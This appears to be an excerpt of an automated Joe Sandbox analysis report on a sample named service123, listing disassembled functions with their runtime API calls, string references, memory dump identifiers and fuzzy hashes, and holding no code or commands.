Part of subcall function 6CAE8520: setlocale.MSVCRT ref: 6CAE8535

Strings

-, xrefs: 6CA75F72
., xrefs: 6CA75D85

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: 4fb8c7dcd337c4bbbae8c65ffa9666ef95e1ce47f0aa5920e15b58d4c537af43
Instruction ID: e5fb3fd7226779c8b1a62556ae6a0c5218082c48c508bdd469cb9c9d411de1c7
Opcode Fuzzy Hash: 4fb8c7dcd337c4bbbae8c65ffa9666ef95e1ce47f0aa5920e15b58d4c537af43
Instruction Fuzzy Hash: 6AD139B5D083198FCB00DFA8C58468EBBF1BF48304F148A2AE895E7751D734D989CB91

Function 6CA76080 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA761AE
memchr.MSVCRT ref: 6CA761CD

Part of subcall function 6CAE8520: setlocale.MSVCRT ref: 6CAE8535

Strings

., xrefs: 6CA761BF
6, xrefs: 6CA763B6

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: 330e5331ad1c51ea58d393c45ac6f9b9710c119db57964cffb0331594b2ab0ad
Instruction ID: aae138b23114f1f8ecd60fc43728f73e672c6fb82a39ec53be9156e66ccaf174
Opcode Fuzzy Hash: 330e5331ad1c51ea58d393c45ac6f9b9710c119db57964cffb0331594b2ab0ad
Instruction Fuzzy Hash: ECD13AB4D093598FCB10DFA8C58468EBBF0BF48304F14866AE894E7751D734D989CB91

Function 6CAF0F90 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CAF0FD5

Strings

basic_string::append, xrefs: 6CAF104D, 6CAF1059, 6CAF114C, 6CAF120C

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: c278ead56a686b8c3d5b401b3d9deddf9438e088172470da4ff70298698249fb
Instruction ID: e6de078c8eed4207bdbacc1f5ee0e0e61f8b0394dc63ec44e9fc9d26fd0838c6
Opcode Fuzzy Hash: c278ead56a686b8c3d5b401b3d9deddf9438e088172470da4ff70298698249fb
Instruction Fuzzy Hash: E1A16DB1A042049FCB00EF69D5C46AEBBF1FF89354F14856DE8988B704D734E889CB92

Function 6CA8B2D0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6CA8997F), ref: 6CA8B336
memcpy.MSVCRT(?,?,?,?,?,?,6CA8997F), ref: 6CA8B3A1
memcpy.MSVCRT(00000000,?,?,6CA8997F), ref: 6CA8B3E8

Strings

basic_string::assign, xrefs: 6CA8B403

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 03c3be9e5c2f8a2fde032900f1d3d434339835cdace3412ec3917208f7811584
Instruction ID: 986d9e2a32727da55faaaf37fdb859811d0fc359311ffabc02d2ea8abf150af8
Opcode Fuzzy Hash: 03c3be9e5c2f8a2fde032900f1d3d434339835cdace3412ec3917208f7811584
Instruction Fuzzy Hash: EA519C71B0A7118BD714DF29E98461AFBE1FF85308B14862DE5558BB24E730D88ACB82

Function 6CA94410 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6CA94471
memcpy.MSVCRT ref: 6CA944DF
memcpy.MSVCRT ref: 6CA94518

Strings

basic_string::assign, xrefs: 6CA94534

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 8ec4c4ef553c8cee0b9051b3d62fa74f29c3a701c2aeec5fd4e3e3e00f277002
Instruction ID: 832b4ddc567d42eddee02054d789533c2dbc9f16d7755d8f8d2bc4189d75b285
Opcode Fuzzy Hash: 8ec4c4ef553c8cee0b9051b3d62fa74f29c3a701c2aeec5fd4e3e3e00f277002
Instruction Fuzzy Hash: B051AB71B1A2118FD700DF69D58561AFBE5AFC2308F158A6DE4A48B718D730D889CB82

Function 6CA4E980 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA4E9AA
wcslen.MSVCRT ref: 6CA4EA1A

Strings

basic_string: construction from null is not valid, xrefs: 6CA4E9E2, 6CA4EA52, 6CA4EAC2

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: dcb6821d249dd93003466c8bb857168db4214ab1d342091cf5df6da08cff2447
Instruction ID: efb34ddd99f92f8379314ca2e848eb42af27baba009f5289afe3498ed429d361
Opcode Fuzzy Hash: dcb6821d249dd93003466c8bb857168db4214ab1d342091cf5df6da08cff2447
Instruction Fuzzy Hash: F441ACF1A096148FCB00EF2CD58185AFBE0BB44218F56897DE8848B315E731E8C9CBD2

Function 6CA4E581 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA4E5AD
strlen.MSVCRT ref: 6CA4E5FD

Strings

basic_string: construction from null is not valid, xrefs: 6CA4E5CF, 6CA4E61F, 6CA4E66F

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 3facdaf4c65a95099db6b14febcdd49629a97e41a3bec0bc955b10b1764a2cff
Instruction ID: 0d14454c322c1f5070f0f95f7a5f60520be256876ff24d9faa1ea093fd8c3335
Opcode Fuzzy Hash: 3facdaf4c65a95099db6b14febcdd49629a97e41a3bec0bc955b10b1764a2cff
Instruction Fuzzy Hash: 383184B1A157548FCB00FF2CD58189ABBE4BF05618F46496DE888CB711D331DC8ACB92

Function 007B7C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 007B7C92
MultiByteToWideChar.KERNEL32 ref: 007B7CD5

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 5db04d4aaf5712fca41c27196940a13afca7fc4002bbbf03fc7a29d0a2c07daa
Instruction ID: f161ba8f1618ad43551909ea0a12da1f6443233cf172487e85e0edc04df99803
Opcode Fuzzy Hash: 5db04d4aaf5712fca41c27196940a13afca7fc4002bbbf03fc7a29d0a2c07daa
Instruction Fuzzy Hash: 0731E2B060D3418FD714DF28D5847AABBE0BF85354F14892DE8948B350E7BAD849CB92

Function 6CA39660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6CA396B2
MultiByteToWideChar.KERNEL32 ref: 6CA396F5

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: d3a1c20df7f627291d7b53d1c9191c9c98885e2fbb401aa9ddd761dc53aaa243
Instruction ID: 62926135c046360dc40a59247c0cfd9d63a7afd16f8fc2719ca2519b68c14d66
Opcode Fuzzy Hash: d3a1c20df7f627291d7b53d1c9191c9c98885e2fbb401aa9ddd761dc53aaa243
Instruction Fuzzy Hash: F431F7745093518FD700DF39E69824ABBF0BF86318F14895DE8D887791E776D988CB42

Function 6CA2F511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6CA2F5C1

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 3842d08b3f989e2a557b8d6c52ad605384f87bd31dfe20463566a0e623384a43
Instruction ID: 9697e12594f2c1b6699bf60af85ae27d10a12b02f91d3a15f9359932e78580f7
Opcode Fuzzy Hash: 3842d08b3f989e2a557b8d6c52ad605384f87bd31dfe20463566a0e623384a43
Instruction Fuzzy Hash: 5B416970A0A3218FDB14EF29E9847467BF4FB46319F18C21CD8585B358D374D886CB92

Function 6CA2F6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6CA2F751

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: b145e4bf79d88ff6ecdf22418d48f64ecc9ba057003a8d7e0758fd813276478c
Instruction ID: d369b1cdd60482fecfa1874d2d2919028cf134701a32875ae2cf5dac8cb2d514
Opcode Fuzzy Hash: b145e4bf79d88ff6ecdf22418d48f64ecc9ba057003a8d7e0758fd813276478c
Instruction Fuzzy Hash: 17317870A0A3218FDB04AF29D9887067BF4FB4631DF18C21DD8948B798D379D486CB92

Function 6CA2F9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6CA2FA72
CreateSemaphoreW.KERNEL32 ref: 6CA2FAB7
WaitForSingleObject.KERNEL32 ref: 6CA2FB00

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 3d1a6015c28bec968384ccb585b0a9d731e13e5d8ee62b92a77c4aab046b0529
Instruction ID: b9f548bd6611c157b341f693013fa49075445996106f90afedb6664309cabc9c
Opcode Fuzzy Hash: 3d1a6015c28bec968384ccb585b0a9d731e13e5d8ee62b92a77c4aab046b0529
Instruction Fuzzy Hash: 90312A70A0A3218FDB14EF29D9843067BF4BB46319F08C61CE85997388D374D946CF92

Function 6CA2FB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6CA2FBF2
CreateSemaphoreW.KERNEL32 ref: 6CA2FC37
WaitForSingleObject.KERNEL32 ref: 6CA2FC80

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 885ef5335ea9f71a00233118651079e6e1e3391f9b4ac2fd418b381dd4cf52ca
Instruction ID: da0dfb970b14a61ab33dd1be8683e26c9d25e809d6f2269077090762c408ea32
Opcode Fuzzy Hash: 885ef5335ea9f71a00233118651079e6e1e3391f9b4ac2fd418b381dd4cf52ca
Instruction Fuzzy Hash: EE313B70A0A3218FDB05AF29C9843067BF5BB46359F18C25CEC549B388C378D486CF92

Function 6CA255A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA272FE

Strings

}, xrefs: 6CA27392
{parm#, xrefs: 6CA272D9
this, xrefs: 6CA255B3

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 46609795e15862df7eb076d6c494dfef6092e1707aaca41840d2cdcffc7d7d6c
Instruction ID: e79e26e72803d5e9fd1f04332e85ad543abe2e60bd1ec66a7a9c9d6b6f18a180
Opcode Fuzzy Hash: 46609795e15862df7eb076d6c494dfef6092e1707aaca41840d2cdcffc7d7d6c
Instruction Fuzzy Hash: F521837150D361CFD7018F14C0843A9BBA1AF95304F1D85BEDCC88FA0AD77999C98BA2

Function 007B1001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 007B106B
__p__fmode.MSVCRT ref: 007B1070
__p__commode.MSVCRT ref: 007B107D

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 399931dd805b4e1626bf3a0ba94bcd7ccd2c108a32590456b88ef4f0f95ca03a
Instruction ID: 594893c4227a359ac51fc57843a1a88e74e354d62d5609f8d0a49c709a6ee4d3
Opcode Fuzzy Hash: 399931dd805b4e1626bf3a0ba94bcd7ccd2c108a32590456b88ef4f0f95ca03a
Instruction Fuzzy Hash: 98215C70614202CBC724BF20C5B9BE633A1BB40344FD48668D4588B256E77ED8C6DB99

Function 6CA99F70 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CA99F85
strlen.MSVCRT ref: 6CA99F8F
memcpy.MSVCRT ref: 6CA99FB8
setlocale.MSVCRT ref: 6CA99FCC

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 1d5aece7281d0082bfd10f9f9bcd181b183b1662e3c1c2f84f4d103709c55cbd
Instruction ID: 6d1f042e99670bb14c7d5644dedc39e58ceeb0a34b3fc4f584be86aa0930d85b
Opcode Fuzzy Hash: 1d5aece7281d0082bfd10f9f9bcd181b183b1662e3c1c2f84f4d103709c55cbd
Instruction Fuzzy Hash: C6F0B7B19093259AD3007F7896553AEBAE4AF84648F058E1DE4C9CB710DB748489DB92

Function 007B4558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

@, xrefs: 007B4647
u, xrefs: 007B4596

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: e01041c3a0539a47ce443bf169fcc7749760cf270370668c0d7cf4275f53be26
Instruction ID: d42a5a347b3591a12a1a6dbbe3644675abb602ed381db025969efbbab46751d4
Opcode Fuzzy Hash: e01041c3a0539a47ce443bf169fcc7749760cf270370668c0d7cf4275f53be26
Instruction Fuzzy Hash: 09A17C716083958BCB31CF24C0903EBBBE1BF85718F148A1DE9D997246D739D94ADB82

Function 6CA34C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6CA34C66
@, xrefs: 6CA34D17

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 1821587e11b324ef9b50ca740f518a24ad818aa915a00f7e293ea4857c906b0f
Instruction ID: 5853b4cb03c2812f6274c86002f54d072f574d5bb7472b548a4e4c1161800171
Opcode Fuzzy Hash: 1821587e11b324ef9b50ca740f518a24ad818aa915a00f7e293ea4857c906b0f
Instruction Fuzzy Hash: 74A16E7160C3A58BD721CE29C0A039ABBE1BB85318F18961DE8DCCB691D735D589CB82

Function 007B4C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 007B4DBE

Part of subcall function 007B2830: fputc.MSVCRT ref: 007B28F8

Strings

@, xrefs: 007B4647
(null), xrefs: 007B4C27

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
